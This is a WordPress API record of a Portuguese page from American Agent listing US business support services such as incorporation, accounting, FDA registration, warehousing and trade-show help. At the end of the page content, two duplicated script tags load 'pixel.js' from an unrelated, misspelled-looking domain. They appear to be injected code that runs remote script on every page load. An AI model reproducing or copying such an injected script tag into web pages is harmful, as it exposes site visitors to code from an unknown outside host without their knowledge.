{"id":3136,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-09-05T11:15:18","modified_gmt":"2014-09-05T15:15:18","slug":"eua-servicos-de-apoio","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/","title":{"rendered":"EUA SERVI\u00c7OS DE APOIO"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-4fcd8c0f2055e43b3eb323f1c0c0b550\">\n#top .av-special-heading.av-av_heading-4fcd8c0f2055e43b3eb323f1c0c0b550{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-4fcd8c0f2055e43b3eb323f1c0c0b550 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-4fcd8c0f2055e43b3eb323f1c0c0b550 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-4fcd8c0f2055e43b3eb323f1c0c0b550 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >EUA SERVI\u00c7OS DE APOIO<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-2989cb1a500f76248ec894598f4e8e5e '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Por vezes, h\u00e1 alguns servi\u00e7os importantes que s\u00e3o necess\u00e1rios para completar a solu\u00e7\u00e3o. A listagem abaixo reflete os servi\u00e7os que s\u00e3o realizados pela rede de parceiros comprovada.<\/p>\n<p>Muitos dos parceiros estiveram envolvidos com os mesmos clientes. Por j\u00e1 conhecer o processo e outras pessoas envolvidas, o resultado \u00e9 uma solu\u00e7\u00e3o econ\u00f3mica e um processo de comunica\u00e7\u00e3o r\u00e1pido.<\/p>\n<p>A lista abaixo serve apenas como uma apresenta\u00e7\u00e3o de algumas das quest\u00f5es que somos capazes de orquestrar em seu nome aqui nos EUA.<\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-afda161a9392fde0d8928f69bf37ad85 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Incorpora\u00e7\u00e3o nos EUA (Inc. ou LLC).\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Incorpora\u00e7\u00e3o nos EUA (Inc. ou LLC).<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-ce42679b9924ba92c34118287d91b140 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Quest\u00f5es locais de opera\u00e7\u00e3o banc\u00e1ria - Factura\u00e7\u00e3o, cobran\u00e7a, contabilidade e prepara\u00e7\u00e3o de impostos por empresas parceiras conhecidas e de confian\u00e7a de Chicago.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Quest\u00f5es locais de opera\u00e7\u00e3o banc\u00e1ria - Factura\u00e7\u00e3o, cobran\u00e7a, contabilidade e prepara\u00e7\u00e3o de impostos por empresas parceiras conhecidas e de confian\u00e7a de Chicago.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-79cdb97ebc42e7853820c494359102a3 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Escrit\u00f3rio americano \u2013 O seu pr\u00f3prio endere\u00e7o e n\u00famero de telefone dedicado, com servi\u00e7o de atendimento, muito bom para o apoio ao cliente local e para mostrar a presen\u00e7a local nos EUA.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Escrit\u00f3rio americano \u2013 O seu pr\u00f3prio endere\u00e7o e n\u00famero de telefone dedicado, com servi\u00e7o de atendimento, muito bom para o apoio ao cliente local e para mostrar a presen\u00e7a local nos EUA.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-313326254b5d433debc819d701ab4019 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Entreposto e armazenamento do produto (quentes ou congelados), log\u00edstica do produto, distribui\u00e7\u00e3o do produto a n\u00edvel nacional.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Entreposto e armazenamento do produto (quentes ou congelados), log\u00edstica do produto, distribui\u00e7\u00e3o do produto a n\u00edvel nacional.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-84618273df69fced7d6d99a4cf2c50ce avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Garantia e programas de retorno do produto.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Garantia e programas de retorno do produto.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-84839091f349564a98d6caa480ea3ff3 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Inscri\u00e7\u00f5es FDA \u2013 A American Agent j\u00e1 tem o nome de &quot;agente local&quot; com o FDA (Administra\u00e7\u00e3o de Alimentos e Medicamentos dos EUA)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Inscri\u00e7\u00f5es FDA \u2013 A American Agent j\u00e1 tem o nome de \"agente local\" com o FDA (Administra\u00e7\u00e3o de Alimentos e Medicamentos dos EUA)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-818885368900515dbeb7ca339b37f558 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Quest\u00f5es de Feiras - Aplica\u00e7\u00f5es, marketing de pr\u00e9-feira, organizar equipamento necess\u00e1rio, transporte, mostra de tradutores, encontrar pessoal extra para cobrir o ch\u00e3o, se necess\u00e1rio\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Quest\u00f5es de Feiras - Aplica\u00e7\u00f5es, marketing de pr\u00e9-feira, organizar equipamento necess\u00e1rio, transporte, mostra de tradutores, encontrar pessoal extra para cobrir o ch\u00e3o, se necess\u00e1rio<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-7a05b512ee6f3d6a7fe09479744653ad avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Qualquer coisa de marketing - Sites locais, tradu\u00e7\u00f5es, folhetos, cat\u00e1logos, impress\u00e3o local, envio de correio organizado ...\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Qualquer coisa de marketing - Sites locais, tradu\u00e7\u00f5es, folhetos, cat\u00e1logos, impress\u00e3o local, envio de correio organizado ...<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-afb7de236c955cd4911a12f4401eda35 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Advogado local dos EUA para supervisionar os contratos com Distribuidores \/ Representantes \/ Clientes \/ Parceiros. Qualquer outra situa\u00e7\u00e3o que exiga an\u00e1lise da aten\u00e7\u00e3o jur\u00eddica.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Advogado local dos EUA para supervisionar os contratos com Distribuidores \/ Representantes \/ Clientes \/ Parceiros. Qualquer outra situa\u00e7\u00e3o que exiga an\u00e1lise da aten\u00e7\u00e3o jur\u00eddica.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-1bf8151bc21e3f7e87f7b8b5ca36e5ee avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Colec\u00e7\u00f5es de contas vencidas. \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Colec\u00e7\u00f5es de contas vencidas. <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-af501213ab22a4c63495a2917d7b30df avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Verifica\u00e7\u00e3o de antecedentes de potenciais parceiros.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Verifica\u00e7\u00e3o de antecedentes de potenciais parceiros.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3136","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/\" \/>\n<meta property=\"og:locale\" content=\"pt_PT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-05T15:15:18+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/eua-servicos-de-apoio\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/eua-servicos-de-apoio\\\/\",\"name\":\"EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-09-05T15:15:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/eua-servicos-de-apoio\\\/#breadcrumb\"},\"inLanguage\":\"pt-PT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/eua-servicos-de-apoio\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/eua-servicos-de-apoio\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"EUA SERVI\u00c7OS DE APOIO\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-PT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/","og_locale":"pt_PT","og_type":"article","og_title":"EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-05T15:15:18+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/","url":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/","name":"EUA SERVI\u00c7OS DE APOIO - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-pt\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-09-05T15:15:18+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/#breadcrumb"},"inLanguage":"pt-PT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-pt\/eua-servicos-de-apoio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-pt\/"},{"@type":"ListItem","position":2,"name":"EUA SERVI\u00c7OS DE APOIO"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-pt\/#website","url":"https:\/\/americanagent.com\/pt-pt\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-pt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-PT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/comments?post=3136"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3136\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/media?parent=3136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}